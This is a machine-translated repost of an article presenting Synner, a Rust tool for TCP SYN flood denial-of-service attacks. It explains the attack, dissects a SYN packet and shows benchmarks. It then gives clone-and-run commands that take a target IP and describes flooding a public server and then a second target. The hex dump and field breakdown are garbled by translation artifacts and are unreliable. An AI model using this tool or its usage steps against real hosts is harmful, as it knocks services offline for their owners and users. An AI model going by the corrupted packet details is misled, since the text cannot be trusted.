Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to achieve TCP SYN Flood, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Abstract

Denial of service attacks (DDoS) have been playing a role since 1970 and have brought inestimable losses to major organizations around the world. In this article, we will introduce you to a specific DoS attack, the TCP SYN Flood attack, and introduce a tool called Synner.

The tool, developed in Rust and driven by libpnet, is still under development (WIP), but now has enough functionality to be released and shared with the community.

Introduction

Synner can send SYN packets to the target quickly and continuously, and cause a denial of service to the target. Generally speaking, writing and opening up such attack tools has been criticized by many researchers in the security community, but I personally don't think so, because we can better protect ourselves only if we clearly know how to implement the attack.

Principle of TCP SYNFlood attack

The TCP SYNFlood attack uses TCP's three-way handshake (SYN-> SYN/ACK-> ACK), as shown in the following figure:

The core idea is to send SYN packets synchronously, which is very easy for the sender (attacker) and more resources for the receiver (target) to receive and process the packets. In addition, after sending the SYN packet, we do not need to wait for the SYN/ACK packet returned by the receiver, we just need to continue to send the SYN packet to the other side and let the server handle it. In this way, when a legitimate user tries to connect to the server, the server already has a large number of SYN connections to process, so it will not be able to respond to the legitimate user's request in a timely manner.

Another difficulty for the receiver is that the request source can be forged, especially the src port, which makes it more difficult to shield illegal requests.

The following is the hexadecimal form of a random TCP SYN packet:

0000 08 00 27 cb 9d 0b 48 4d 7e 9c 79 4b 08 00 4500. 'Mr.. HM ~ .yK..E.0010 00 34 7e b2 40 00 06 b8 c0a8 21 01 c0a8. 4 ~ ²@. 0020 21 0a f8 e0 b5 58 f4 fa f1 e9 0000 0000 8002! .eggs μ X circle ú é. 0030 fa f066 5b 0000 03 03 04 02 04 b401 ú roomf [.e.0040 01 00

The parsed results are as follows:

0x08 IPv4 0x00, 0x27, 0xcb, 0x9d, 0x0b, / / Destination MAC0x48,0x4d, 0x7e, 0x9c, 0x79, 0x4b, / / Source MAC0x08,0x00, / / Type (IPv4) 0x45, / / IPv4 Header Length0x00 / / Explicit Congestion Notification (congestion control) 0x00jue 0x34, / / Total length0x7e,0xb2, / / Identification number0x40,0x00 / / Fragment Offset (Don't Fragment packet for us, it's under 1460 bytes) 0x80, / / Time to Live (128C) 0x06, / / IP protocol version (6/TCP) 0xb8j0xb5 / / Header checksum using internet checksum technique (validation disabled) 0xc0Power0xa8, 0x21, 0x01, / / Source IP0xc0,0xa8, 0x21, 0x0a, / / Destination IP0xf8,0xe0, / / TCP Source Port (max 65535) 0xb5author0x58 / / TCP Destination Port (max 65535) 0xf4 since this is just a SYN packet0x80,0x02 0xfa, 0xf1, 0xe9, / / Sequence number, generally random to avoid other variants of TCP attacks0x00,0x00, 0x00re0x00, / / TCP ACK value set to 0 since this is just a SYN packet0x80,0x02 / / TCP flags (only SYN [00000010] bit is set) 0xfapenol 0xf0, / / TCP window size0x66,0x5b, / / TCP checksum0x00,0x00, / / TCP urgent pointer set to 0 Useful with stuff like FTP that use port 20 & 21 for control & transfer0x03,0x03, 0x08, 0x04, / / TCP Options0x02,0x02, 0x04, 0x05, 0xb4, / / TCP Options values0x01,0x01, 0x00 / / TCP NOP option (padding) Synner how fast is it?

Synner was slow at first, first of all, I didn't use any compiler to optimize it, and secondly, I chose to use pnet_datalink::DataLinkSender::send_to instead of pnet_datalink::DataLinkSender::build_and_send, which meant that the way I chose to clone packets was not perfect. As a result, it took Synner 29.48 seconds to send 1000000 TCPSYN packets, equivalent to 33921 packets per second, which was simply unbearable.

However, after optimization, the results are relatively good, the data are as follows:

The original Powershell output is as follows:

PS C:\ Users\ jdb\ Projects\ synner\ target\ release > Measure-Command {. / synner 192.168.33.10 "\ Device\ NPF_ {927C716F-3AD0-42D6-89A1-0B121C6F5413}"} Days: 0Hours: 0Minutes: 0Seconds: 6Milliseconds: 736Ticks: 67369563TotalDays: 7.797403125E-05TotalHours: 0.00187137675TotalMinutes: 0.112282605TotalSeconds : 6.7369563TotalMilliseconds: 6736.9563 PSC:\ Users\ jdb\ Projects\ synner\ target\ release > pushd.. / debugPSC:\ Users\ jdb\ Projects\ synner\ target\ debug > Measure-Command {. / synner192.168.33.10 "\ Device\ NPF_ {927C716F-3AD0-42D6-89A1-0B121C6F5413}" Days: 0Hours: 0Minutes: 0Seconds: 19Milliseconds: 688Ticks: 196886353TotalDays : 0.00022787772337963TotalHours: 0.00546906536111111TotalMinutes: 0.328143921666667TotalSeconds: 19.6886353TotalMilliseconds: 19688.6353 tool requirements

1. Rustc/cargov1.27.0

2. WinPcapfor libpnet (Windows)

Tool use

First use the following command to clone the project source code:

Git clone https://github.com/JuxhinDB/synner.git

Then run the following command:

Cargo run TARGET_IP INTERFACE_NAME

To ensure that a complete list of network interfaces can be exported, be sure to run the command line tool with administrator privileges.

If you are not sure about the interface name, you can use\ DEVICE\ to view the interface list, for example:

Cargo run 192.168.33.10\ DEVICE\ Compiling synner v0.1.0 (file:///C:/Users/juxhindb/Projects/synner) Finished dev [unoptimized + debuginfo] target (s) in 1.63s Running `target\ debug\ synner.exe192.168.33.10\ DEVICE\ `Listof Available Interfaces Interfacename: "\\ Device\\ NPF_ {B1BBC7C0-C3CF-490B-A640-00ABDB86F989}" InterfaceMAC: 0a:00:27:00:00:12InterfaceIP: 192.168.99.1 Interfacename: "\\ Device\\ NPF_ {AD266AD1-7AE0-4360-8EE5-ED6283B43B9C}" InterfaceMAC: 2a:56:5a:4f:fc:e9InterfaceIP: 0.0.0.0 Interfacename: "\\ Device\\ NPF_ {2288F93F-E56C-4F71-8B8E-C385BE71421F}" InterfaceMAC: 1a:56:5a:4f:fc:e9InterfaceIP: 0.0.0.0 use sample

Run the following command to test a DigitalOcean test case:

Cargo run 206.189.96.237\ Device\ NPF_ {F94968E8-FBA0-410D-8CD3-F205AEAD4DC9}

In the following GIF, at the bottom is the interface running Synner, and on the right is a SSH connection to view the TCP connection information (sudotcpdump "TCP [tcpflags] & (tcp-syn)! = 0"-I eth0-n). When I successfully TCP SYN Flood the first target, the left shows me trying to attack the second target.

About how to achieve TCP SYN Flood is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.